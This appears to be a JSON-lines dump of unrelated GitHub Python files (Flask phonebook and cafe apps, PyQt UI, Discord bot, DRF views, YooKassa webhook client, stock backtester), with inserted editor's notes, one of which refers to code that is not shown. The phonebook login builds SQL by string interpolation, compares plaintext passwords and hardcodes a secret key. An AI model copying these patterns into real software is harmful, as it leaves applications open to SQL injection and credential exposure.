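Editor's note: the subscription wiring above reduces to a small decision rule: watch_max entries alert when a published number exceeds the threshold, watch_min entries when it falls below, and non-numeric payloads are ignored. That rule in isolation (the function name and sample values are illustrative):

comparators = {'watch_max': lambda x, y: x > y,
               'watch_min': lambda x, y: x < y}

def should_alert(kind, value, threshold):
    # Non-numeric data is ignored, as in the agent's is_number() guard.
    try:
        value = float(value)
    except (TypeError, ValueError):
        return False
    return comparators[kind](value, threshold)

print(should_alert('watch_max', 99.5, 99))   # True: above the max threshold
print(should_alert('watch_min', 1.2, 0))     # False: not below the min threshold
print(should_alert('watch_max', 'n/a', 99))  # False: non-numeric, ignored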
db.query(\"select * from users where username = '%s'\" % username)\n result_list = query.namedresult()\n if len(result_list) > 0:\n user = result_list[0]\n if user.password == password:\n session['name'] = user.name\n return redirect('/contacts')\n else:\n return redirect('/login')\n else:\n return redirect('/login')\n\n\n@app.route('/logout_page')\ndef logout_page():\n return \"

    Goodbye!

    \"\n\n\n@app.route('/logout', methods=['POST', 'GET'])\ndef logout():\n del session['name']\n return redirect('/')\n\n\n@app.route('/contacts')\ndef contacts():\n contacts = db.query('select * from phonebook').namedresult()\n return render_template(\n 'contacts.html',\n title='All Contacts',\n contacts=contacts\n )\n\n\n@app.route('/new_contact')\ndef new_contact():\n return render_template(\n 'new_contact.html',\n title='New Contact'\n )\n\n\n@app.route('/submit_contact', methods=['POST'])\ndef submit_contact():\n name = request.form.get('name')\n phone_number = request.form.get('phone_number')\n email = request.form.get('email')\n db.insert('phonebook',\n name=name,\n phone_number=phone_number,\n email=email)\n return redirect('/contacts')\n\n\n@app.route('/update_contact')\ndef update_contact():\n id = int(request.args.get('id'))\n query = db.query('''\n select * from phonebook\n where id = %d''' % id)\n contact = query.namedresult()[0]\n return render_template(\n 'update_contact.html',\n contact=contact\n )\n\n\n@app.route('/submit_update', methods=['POST'])\ndef submit_update():\n id = int(request.form.get('id'))\n name = request.form.get('name')\n phone_number = request.form.get('phone_number')\n email = request.form.get('email')\n action = request.form.get('action')\n if action == 'update':\n db.update('phonebook', {\n 'id': id,\n 'name': name,\n 'phone_number': phone_number,\n 'email': email\n })\n elif action == 'delete':\n db.delete('phonebook', {'id': id})\n else:\n raise Exception(\"ERROR\")\n return redirect('/contacts')\napp.secret_key = 'cn0hn42'\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"MarvinM579/phonebook","sub_path":"phonebook.py","file_name":"phonebook.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7999993945","text":"for _ in range(int(input())):\n s = sorted(list(input()))\n m = int(input())\n b = list(map(int, input().split()))\n found = set()\n ans = [None] * m\n while len(found) != m:\n cur = set()\n let = s[-1]\n for i, c in enumerate(b):\n if i in found:\n continue\n tot = sum([abs(i - f) for f in found] + [0])\n if tot == c and s[-1] == let:\n cur.add(i)\n ans[i] = let\n while len(s) and s[-1] == let:\n s.pop()\n found.update(cur)\n print(''.join(ans))","repo_name":"Samhenry97/Competition","sub_path":"CodeForces/650 D3/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26763838852","text":"from pyqtgraph import PlotWidget\r\nfrom PyQt5 import QtCore, QtWidgets\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.setFixedSize(1030, 730)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.btn_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.btn_frame.setGeometry(QtCore.QRect(10, 680, 1021, 80))\r\n self.btn_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.btn_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.btn_frame.setObjectName(\"btn_frame\")\r\n self.layoutWidget = QtWidgets.QWidget(self.btn_frame)\r\n self.layoutWidget.setGeometry(QtCore.QRect(0, 10, 1011, 30))\r\n self.layoutWidget.setObjectName(\"layoutWidget\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget)\r\n self.horizontalLayout.setContentsMargins(0, 0, 
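Editor's note: one caveat in the phonebook app above: submit_login builds its SQL with % string interpolation, so a crafted username can inject SQL. PyGreSQL's query accepts positional parameters, and the lookup would normally be written with a placeholder instead (a sketch against the same db object; the $1 syntax assumes PyGreSQL's positional-parameter support):

# The driver quotes the value; the SQL string never contains raw user input.
query = db.query("select * from users where username = $1", username)
result_list = query.namedresult()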
0, 0)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.selectFolder_label = QtWidgets.QLabel(self.layoutWidget)\r\n self.selectFolder_label.setObjectName(\"selectFolder_label\")\r\n self.horizontalLayout.addWidget(self.selectFolder_label)\r\n self.directoryPath_lineEdit = QtWidgets.QLineEdit(self.layoutWidget)\r\n self.directoryPath_lineEdit.setReadOnly(True)\r\n self.directoryPath_lineEdit.setObjectName(\"directoryPath_lineEdit\")\r\n self.horizontalLayout.addWidget(self.directoryPath_lineEdit)\r\n self.selectFolder_toolButton = QtWidgets.QToolButton(self.layoutWidget)\r\n self.selectFolder_toolButton.setObjectName(\"selectFolder_toolButton\")\r\n self.horizontalLayout.addWidget(self.selectFolder_toolButton)\r\n spacerItem = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout.addItem(spacerItem)\r\n self.start_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.start_btn.setObjectName(\"start_btn\")\r\n self.horizontalLayout.addWidget(self.start_btn)\r\n self.stop_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.stop_btn.setObjectName(\"stop_btn\")\r\n self.horizontalLayout.addWidget(self.stop_btn)\r\n self.plot_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.plot_btn.setObjectName(\"plot_btn\")\r\n self.horizontalLayout.addWidget(self.plot_btn)\r\n self.export_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.export_btn.setObjectName(\"export_btn\")\r\n self.horizontalLayout.addWidget(self.export_btn)\r\n self.clear_btn = QtWidgets.QPushButton(self.layoutWidget)\r\n self.clear_btn.setObjectName(\"clear_btn\")\r\n self.horizontalLayout.addWidget(self.clear_btn)\r\n self.folder_tree_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.folder_tree_frame.setGeometry(QtCore.QRect(0, 0, 271, 671))\r\n self.folder_tree_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.folder_tree_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.folder_tree_frame.setObjectName(\"folder_tree_frame\")\r\n self.layoutWidget1 = QtWidgets.QWidget(self.folder_tree_frame)\r\n self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 261, 661))\r\n self.layoutWidget1.setObjectName(\"layoutWidget1\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget1)\r\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.files_label = QtWidgets.QLabel(self.layoutWidget1)\r\n self.files_label.setObjectName(\"files_label\")\r\n self.verticalLayout_2.addWidget(self.files_label)\r\n self.folder_tree = QtWidgets.QTreeView(self.layoutWidget1)\r\n self.folder_tree.setObjectName(\"folder_tree\")\r\n self.verticalLayout_2.addWidget(self.folder_tree)\r\n self.status_lineEdit = QtWidgets.QLineEdit(self.layoutWidget1)\r\n self.status_lineEdit.setReadOnly(True)\r\n self.status_lineEdit.setObjectName(\"status_lineEdit\")\r\n self.verticalLayout_2.addWidget(self.status_lineEdit)\r\n self.plot_frame = QtWidgets.QFrame(self.centralwidget)\r\n self.plot_frame.setGeometry(QtCore.QRect(270, 10, 761, 661))\r\n self.plot_frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.plot_frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.plot_frame.setObjectName(\"plot_frame\")\r\n self.layoutWidget2 = QtWidgets.QWidget(self.plot_frame)\r\n self.layoutWidget2.setGeometry(QtCore.QRect(10, 20, 741, 641))\r\n self.layoutWidget2.setObjectName(\"layoutWidget2\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget2)\r\n 
self.verticalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.plot_tip_temp = PlotWidget(self.layoutWidget2)\r\n self.plot_tip_temp.setObjectName(\"plot_tip_temp\")\r\n self.verticalLayout.addWidget(self.plot_tip_temp)\r\n self.plot_steam_temp = PlotWidget(self.layoutWidget2)\r\n self.plot_steam_temp.setObjectName(\"plot_steam_temp\")\r\n self.verticalLayout.addWidget(self.plot_steam_temp)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.actionOpen = QtWidgets.QAction(MainWindow)\r\n self.actionOpen.setObjectName(\"actionOpen\")\r\n self.actionSave = QtWidgets.QAction(MainWindow)\r\n self.actionSave.setObjectName(\"actionSave\")\r\n self.actionExit = QtWidgets.QAction(MainWindow)\r\n self.actionExit.setObjectName(\"actionExit\")\r\n self.actionSelect_Data_Repository = QtWidgets.QAction(MainWindow)\r\n self.actionSelect_Data_Repository.setObjectName(\r\n \"actionSelect_Data_Repository\")\r\n self.actionSelect_Data_Directory = QtWidgets.QAction(MainWindow)\r\n self.actionSelect_Data_Directory.setObjectName(\r\n \"actionSelect_Data_Directory\")\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\r\n \"MainWindow\", \"PILS Data Visualizer\"))\r\n self.selectFolder_label.setText(_translate(\r\n \"MainWindow\", \"Select PILS folder path:\"))\r\n self.selectFolder_toolButton.setText(_translate(\"MainWindow\", \"...\"))\r\n self.start_btn.setText(_translate(\"MainWindow\", \"Start Monitoring\"))\r\n self.stop_btn.setText(_translate(\"MainWindow\", \"Stop Monitoring\"))\r\n self.plot_btn.setText(_translate(\"MainWindow\", \"Plot Selected File \"))\r\n self.export_btn.setText(_translate(\"MainWindow\", \"Export as xlsx\"))\r\n self.clear_btn.setText(_translate(\"MainWindow\", \"Clear Plot\"))\r\n self.files_label.setText(_translate(\"MainWindow\", \"Files:\"))\r\n self.actionOpen.setText(_translate(\"MainWindow\", \"Open\"))\r\n self.actionSave.setText(_translate(\"MainWindow\", \"Export As xlsx\"))\r\n self.actionExit.setText(_translate(\"MainWindow\", \"Exit\"))\r\n self.actionSelect_Data_Repository.setText(\r\n _translate(\"MainWindow\", \"Select Data Repository\"))\r\n self.actionSelect_Data_Directory.setText(\r\n _translate(\"MainWindow\", \"Select Folder\"))\r\n","repo_name":"briankyk/pils-data-visualization-app","sub_path":"Ui_scripts.py","file_name":"Ui_scripts.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30402658385","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\nclass Score:\n def __init__(self):\n self.d = {\"Ravenclaw\": [],\n \"Gryffindor\": [],\n \"Slytherin\": [],\n \"Hufflepuff\": []}\n\ndef create_scatter_plot(df, subject1, subject2):\n score1 = Score()\n score2 = Score()\n for i in range(df.shape[0]):\n if df.loc[i][subject1] == df.loc[i][subject1] and df.loc[i][subject2] == df.loc[i][subject2]:\n score1.d[df.loc[i][\"Hogwarts House\"]].append(df.loc[i][subject1])\n score2.d[df.loc[i][\"Hogwarts House\"]].append(df.loc[i][subject2])\n\n\n plt.scatter(score1.d.get(\"Ravenclaw\"), score2.d.get(\"Ravenclaw\"), color=\"blue\", alpha=0.4)\n plt.scatter(score1.d.get(\"Gryffindor\"), score2.d.get(\"Gryffindor\"), color=\"red\", alpha=0.4)\n plt.scatter(score1.d.get(\"Slytherin\"), score2.d.get(\"Slytherin\"), 
color=\"green\", alpha=0.4)\n plt.scatter(score1.d.get(\"Hufflepuff\"), score2.d.get(\"Hufflepuff\"), color=\"yellow\", alpha=0.4)\n plt.title(f\"{subject1} and {subject2}\")\n plt.xlabel(subject1)\n plt.ylabel(subject2)\n plt.show()\n\n\n\nif __name__ == '__main__':\n df = pd.read_csv(\"dataset_train.csv\")\n subjects = [\"Arithmancy\",\n \"Astronomy\",\n \"Herbology\",\n \"Defense Against the Dark Arts\",\n \"Divination\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"History of Magic\",\n \"Transfiguration\",\n \"Potions\",\n \"Care of Magical Creatures\",\n \"Charms\",\n \"Flying\"]\n\n if len(sys.argv) == 1:\n for i in range(len(subjects)):\n for j in range(i + 1, len(subjects)):\n create_scatter_plot(df, subjects[i], subjects[j])\n elif len(sys.argv) == 3 and sys.argv[1] in subjects and sys.argv[2] in subjects:\n create_scatter_plot(df, sys.argv[1], sys.argv[2])\n else:\n print(\"wrong arguments\")","repo_name":"mda-sha/dslr","sub_path":"scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12453759816","text":"import discord\nfrom discord.ext import commands\nimport warframe\n\nprint(warframe.find_url('Cool'))\n\nbot = commands.Bot(command_prefix='!',\n description='Warframe market price checker')\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n\n\n@bot.command()\nasync def hello():\n await bot.say('Hello!')\n\ntoken = open('token.txt','r').read()\nbot.run(token)\n","repo_name":"andrew-houghton/warframe-bot","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5363003203","text":"from flask import Flask, render_template, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, SelectField\nfrom wtforms.fields.html5 import URLField, TimeField\nfrom wtforms.validators import DataRequired, Length\nimport csv\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\nBootstrap(app)\n\n\nclass CafeForm(FlaskForm):\n cafe = StringField(label='Cafe name', validators=[DataRequired(), Length(min=4)])\n location = URLField(label='Location', validators=[DataRequired()])\n opening_time = TimeField(label=\"Opening Time\", validators=[DataRequired()])\n closing_time = TimeField(label=\"Closing Time\", validators=[DataRequired()])\n coffee_rating = SelectField(label=\"Coffee Rating\", validators=[DataRequired()], choices=[\"☕\", \"☕☕\", \"☕☕☕\", \"☕☕☕☕\", \"☕☕☕☕☕\"])\n wifi = SelectField(label=\"Wifi Strength\", validators=[DataRequired()], choices=[\"💪\", \"💪💪\", \"💪💪💪\", \"💪💪💪💪\", \"💪💪💪💪💪\"])\n power = SelectField(label=\"Power Socket Availability\", validators=[DataRequired()], choices=[\"🔌\", \"🔌🔌\", \"🔌🔌🔌\", \"🔌🔌🔌🔌\", \"🔌🔌🔌🔌🔌\"])\n submit = SubmitField(label='Submit')\n\n\n# all Flask routes below\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route('/add', methods=[\"GET\", \"POST\"])\ndef add_cafe():\n form = CafeForm()\n if form.validate_on_submit():\n print(\"True\")\n with open('cafe-data.csv', mode=\"a\", newline='', encoding=\"utf-8\") as file:\n file.write(f\"\\n{form.cafe.data}, \"\n f\"{form.location.data}, \"\n f\"{form.opening_time.data}, \"\n f\"{form.closing_time.data},\"\n 
f\"{form.coffee_rating.data},\"\n f\"{form.wifi.data},\"\n f\"{form.power.data}\")\n return redirect(url_for('cafes'))\n return render_template('add.html', form=form)\n\n\n@app.route('/cafes')\ndef cafes():\n with open('cafe-data.csv', newline='', encoding='utf-8') as csv_file:\n csv_data = csv.reader(csv_file, delimiter=',')\n list_of_rows = []\n for row in csv_data:\n list_of_rows.append(row)\n return render_template('cafes.html', cafes=list_of_rows)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"EBR-code/coffee-wifi-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9333790089","text":"from rest_framework.viewsets import GenericViewSet\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin, CreateModelMixin, UpdateModelMixin, DestroyModelMixin\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom apps.users.models import User\nfrom apps.users.permissions import IsOwner\nfrom apps.users.serialisers import UserCreateSerializer, UserDetailSerializer, GetUserInfoSerializer\nfrom apps.chats.models import Chat\n\n\nclass UserApiViewSet(GenericViewSet,\n CreateModelMixin,\n ListModelMixin):\n queryset = User.objects.all()\n serializer_class = UserCreateSerializer\n\n\nclass UserDetailApiViewSet(GenericViewSet,\n RetrieveModelMixin,\n UpdateModelMixin,\n DestroyModelMixin):\n queryset = User.objects.all()\n serializer_class = UserDetailSerializer\n permission_classes = [IsOwner]\n\n @action(\n detail=False, permission_classes=[IsAuthenticated], methods=[\"get\"]\n )\n def current_user(self, request, email=None):\n serializer = GetUserInfoSerializer(request.user)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(\n detail=False, permission_classes=[IsAuthenticated], methods=[\"get\"]\n )\n def another_user(self, request, email=None):\n lst = []\n chats = Chat.objects.filter(members__in=[request.user])\n for user in User.objects.all():\n for chat in chats:\n if user in chat.members.all() or user == request.user:\n continue\n lst.append(user)\n users = User.objects.filter(id__in=[i.id for i in set(lst)])\n serializer = UserDetailSerializer(users, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n","repo_name":"Saidulloh/Chat-API","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11884897401","text":"# -*- coding: utf-8 -*-\nimport uuid\n\nfrom yookassa.client import ApiClient\nfrom yookassa.domain.common.http_verb import HttpVerb\nfrom yookassa.domain.request.webhook_request import WebhookRequest\nfrom yookassa.domain.response.webhook_response import WebhookResponse, WebhookList\n\n\nclass Webhook:\n base_path = '/webhooks'\n\n def __init__(self):\n self.client = ApiClient()\n\n \"\"\"\n Get list of installed webhooks\n \n :return: WebhookList\n \"\"\"\n @classmethod\n def list(cls):\n instance = cls()\n path = cls.base_path\n\n response = instance.client.request(HttpVerb.GET, path)\n return WebhookList(response)\n\n \"\"\"\n Add webhook\n\n :param params: data passed to API\n :param idempotency_key:\n :return: WebhookResponse\n \"\"\"\n @classmethod\n def add(cls, params, 
idempotency_key=None):\n instance = cls()\n path = cls.base_path\n if not idempotency_key:\n idempotency_key = uuid.uuid4()\n headers = {\n 'Idempotence-Key': str(idempotency_key)\n }\n\n if isinstance(params, dict):\n params_object = WebhookRequest(params)\n elif isinstance(params, WebhookRequest):\n params_object = params\n else:\n raise TypeError('Invalid params value type')\n\n response = instance.client.request(HttpVerb.POST, path, None, headers, params_object)\n return WebhookResponse(response)\n\n \"\"\"\n Remove webhook\n\n :param webhook_id: \n :param idempotency_key:\n :return: WebhookResponse\n \"\"\"\n @classmethod\n def remove(cls, webhook_id, idempotency_key=None):\n instance = cls()\n path = cls.base_path + '/' + webhook_id\n if not idempotency_key:\n idempotency_key = uuid.uuid4()\n headers = {\n 'Idempotence-Key': str(idempotency_key)\n }\n\n response = instance.client.request(HttpVerb.DELETE, path, None, headers)\n return WebhookResponse(response)\n","repo_name":"yoomoney/yookassa-sdk-python","sub_path":"src/yookassa/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"51"} +{"seq_id":"12379424309","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncommission = 0.00015\ntax = 0.0025\n\n\nclass Trade:\n def __init__(self, initial_funds):\n self.initial_funds = initial_funds\n self.least_funds = initial_funds * 0.2\n self.investable_funds = initial_funds * 0.8\n self.stock_amount = 0\n\n def BuyStock(self, stock_price):\n amount_buy = self.investable_funds // stock_price\n if amount_buy <= 0:\n return False\n\n commission_buy = stock_price * amount_buy * commission\n if self.investable_funds - stock_price * amount_buy - commission_buy < 0:\n while True:\n amount_buy -= 1\n commission_buy = stock_price * amount_buy * commission\n if self.investable_funds - stock_price * amount_buy - commission_buy > 0:\n break\n\n self.stock_amount += amount_buy\n self.investable_funds -= stock_price * amount_buy + commission_buy\n self.initial_funds = self.investable_funds + self.least_funds\n return True\n\n def SellStock(self, stock_price):\n if self.stock_amount <= 0:\n return False\n\n commission_sell = (stock_price * self.stock_amount) * (commission + tax)\n self.investable_funds += self.stock_amount * stock_price\n self.investable_funds -= commission_sell\n self.stock_amount = 0\n self.initial_funds = self.investable_funds + self.least_funds\n return True\n\ndef SetInitial():\n data = pd.read_csv(\"./data/컴투스_일봉.csv\", header=None,\n names=['종목명', '종목코드', '날짜', '시가', '고가', '저가', '종가', '거래량'], encoding=\"CP949\")\n data = data.sort_values(by=['날짜'])\n data = data.reset_index(drop=True)\n\n trading_vol = 0\n for k in range(len(data.index)):\n trading_vol += data['거래량'].iloc[k]\n trading_vol /= len(data.index)\n\n OBV = []\n OBV.append(0)\n for i in range(1, len(data.index)):\n if data['종가'].iloc[i] > data['종가'].iloc[i - 1]:\n OBV.append(OBV[-1] + data['거래량'].iloc[i])\n elif data['종가'].iloc[i] < data['종가'].iloc[i - 1]:\n OBV.append(OBV[-1] - data['거래량'].iloc[i])\n else:\n OBV.append(OBV[-1])\n data['OBV'] = OBV\n data['OBV_ema'] = data['OBV'].ewm(span=12).mean()\n\n data['ema12'] = data['종가'].ewm(span=12).mean()\n data['ema26'] = data['종가'].ewm(span=26).mean()\n data['MACD'] = data.apply(lambda x: (x[\"ema12\"] - x[\"ema26\"]), axis=1)\n data['MACD_signal'] = data['MACD'].ewm(span=9).mean()\n data[\"MACD_oscillator\"] = data.apply(lambda 
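Editor's note: the Webhook class above exposes three operations: list() GETs the installed webhooks, add() POSTs a WebhookRequest under an Idempotence-Key header (a fresh UUID unless one is supplied), and remove() DELETEs by id. A hedged usage sketch; the credentials, event name and URL are placeholders, and the items attribute on the list response is an assumption about the SDK's response object:

from yookassa import Configuration, Webhook

Configuration.configure('<account_id>', '<secret_key>')  # placeholder credentials

# A dict is accepted and wrapped in a WebhookRequest internally.
created = Webhook.add({'event': 'payment.succeeded',
                       'url': 'https://example.com/notifications'})

for hook in Webhook.list().items:  # assumed list-response attribute
    print(hook.id, hook.event, hook.url)

Webhook.remove(created.id)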
x: (x[\"MACD\"] - x[\"MACD_signal\"]), axis=1)\n data[\"MACD_sign\"] = data.apply(lambda x: (\"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"])\n else (\"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] else 0)), axis=1)\n\n data[\"MACD_sign_with_volume\"] = data.apply(lambda x: (\n \"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"] and x['거래량'] >= trading_vol) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['거래량'] >= trading_vol else 0)), axis=1)\n\n data[\"MACD_sign_with_OBV\"] = data.apply(lambda x: (\n \"매수\" if (0 > x[\"MACD\"] > x[\"MACD_signal\"] and x['OBV'] > x['OBV_ema']) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['OBV'] < x['OBV_ema'] else 0)), axis=1)\n\n data['vol12'] = data['거래량'].ewm(span=12).mean()\n data['vol26'] = data['거래량'].ewm(span=26).mean()\n data['volume'] = data.apply(lambda x: (x[\"vol12\"] - x[\"vol26\"]), axis=1)\n data[\"MACD_sign_with_volume_cross\"] = data.apply(lambda x: (\n \"매수\" if (x[\"MACD_signal\"] < x[\"MACD\"] < 0 < x['volume']) else (\n \"매도\" if 0 < x[\"MACD\"] < x[\"MACD_signal\"] and x['volume'] > 0 else 0)), axis=1)\n\n return data\n\nstock_data = SetInitial()\nstrategy = stock_data['MACD_sign_with_OBV']\n\nplt.rc('font', family='Malgun Gothic')\nplt.rcParams['axes.unicode_minus'] = False\n\nxtick = []\nfor i in np.arange(0, 700, 50):\n xtick.append(str(stock_data['날짜'].iloc[i]))\n\"\"\"\n# MACD, MACD signal chart\nplt.subplot(2, 1, 1)\nplt.title(\"MACD chart\")\nplt.plot(stock_data.index, stock_data[\"MACD\"], stock_data[\"MACD_signal\"])\nfor i in range(len(stock_data.index)):\n if strategy.iloc[i] == \"매수\":\n plt.scatter(stock_data.index[i], stock_data[\"MACD\"].iloc[i], color=\"r\", marker='^')\n elif strategy.iloc[i] == \"매도\":\n plt.scatter(stock_data.index[i], stock_data[\"MACD\"].iloc[i], color=\"b\", marker='v')\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), xtick)\n\n# Oscillator bar\nplt.subplot(2, 1, 2)\nplt.title(\"MACD oscillator\")\noscillator = stock_data[\"MACD_oscillator\"]\nplt.bar(list(stock_data.index), list(oscillator.where(oscillator > 0)), 0.7)\nplt.bar(list(stock_data.index), list(oscillator.where(oscillator < 0)), 0.7)\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), xtick)\n\nplt.subplots_adjust(hspace=0.8)\nplt.show()\n\"\"\"\n\n# backtesting\ninitial_money = int(input(\"initial money : \"))\ntesting = Trade(initial_money)\n\nsell_count = 0\nbuy_count = 0\n\nplt.title(\"매매 chart\")\nplt.plot(stock_data.index, stock_data['종가'])\n\nfor i in range(len(stock_data.index) - 1):\n if strategy.iloc[i] == '매수' or strategy.iloc[i] == '매도':\n print(\"\\033[0m\", end=\"\")\n if strategy.iloc[i] == '매수':\n if testing.BuyStock(stock_data['시가'].iloc[i]):\n print('\\033[95m', end=\"\")\n print(str(strategy.iloc[i]) + \" \" + str(stock_data['날짜'].iloc[i])\n + \" 시가 : \" + str(stock_data['시가'].iloc[i]), end=\"\")\n print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n buy_count += 1\n plt.scatter(stock_data.index[i], stock_data['종가'].iloc[i], color=\"r\", marker='^')\n\n elif strategy.iloc[i] == '매도':\n if testing.SellStock(stock_data['시가'].iloc[i]):\n print('\\033[96m', end=\"\")\n print(str(strategy.iloc[i]) + \" \" + str(stock_data['날짜'].iloc[i])\n + \" 시가 : \" + str(stock_data['시가'].iloc[i]), end=\"\")\n print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n sell_count += 1\n 
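Editor's note: the signal lambdas above encode a specific reading of MACD: buy when 0 > MACD > MACD_signal, i.e. the MACD line has crossed above its 9-period signal while still in negative territory, and sell on the mirror condition above zero; the variants additionally gate on trading volume or on OBV sitting above its own EMA. The bare indicator construction on a toy series (prices are illustrative):

import pandas as pd

close = pd.Series([100, 98, 95, 96, 99, 103, 104, 102, 105, 108.0])

ema12 = close.ewm(span=12).mean()
ema26 = close.ewm(span=26).mean()
macd = ema12 - ema26
signal = macd.ewm(span=9).mean()

buy = (macd < 0) & (macd > signal)   # upward cross while still negative
sell = (macd > 0) & (macd < signal)  # downward cross while still positive
print(pd.DataFrame({'MACD': macd, 'signal': signal, 'buy': buy, 'sell': sell}))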
plt.scatter(stock_data.index[i], stock_data['종가'].iloc[i], color=\"b\", marker='v')\n    \"\"\"\n    if i == 0:\n        if testing.BuyStock(stock_data['시가'].iloc[i]):\n            print('\\033[95m', end=\"\")\n            print(\"매수 \" + str(stock_data['날짜'].iloc[i]) + \" 시가 : \" + str(\n                stock_data['시가'].iloc[i]), end=\"\")\n            print(\"\\n자금 : \" + str(testing.initial_funds) + \" 보유 주식 : \" + str(testing.stock_amount) + '\\n')\n            buy_count += 1\n    \"\"\"\n\n# sell any remaining position on the last trading day (note: Python has no '++' increment operator, so the last row is indexed with i + 1)\nif testing.SellStock(stock_data['시가'].iloc[i + 1]):\n    print(\"매도 \" + str(stock_data['날짜'].iloc[i + 1]) + \" \" + \" 시가 : \" + str(stock_data['시가'].iloc[i + 1]))\n    sell_count += 1\n    plt.scatter(stock_data.index[i + 1], stock_data['종가'].iloc[i + 1], color=\"b\", marker='v')\n\nprint(\"\\nsell_count : \" + str(sell_count) + \"\\nbuy_count : \" + str(buy_count))\nprint(\"before investment : \" + str(initial_money))\nprint(\"after investment : \" + str(testing.initial_funds))\n\nplt.axhline(y=0, color='r', linewidth=1)\nplt.xticks(fontsize=6, rotation=45)\nplt.xticks(np.arange(0, 700, 50), xtick)\nplt.show()\n","repo_name":"kimsangho611/DSL_study","sub_path":"2020202064_전혜림/Project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2776135117","text":"from random import randint\n\nplayer_wins = 0\ncomputer_wins = 0\nwinning_score = 3\n\nwhile player_wins < winning_score and computer_wins < winning_score:\n    print(f\"Player Score: {player_wins} Computer Score: {computer_wins}\")\n    